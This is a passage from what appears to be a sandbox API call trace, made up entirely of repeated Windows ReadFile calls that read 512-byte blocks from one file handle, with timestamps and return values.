out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.966] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.966] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.966] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.966] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.966] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, 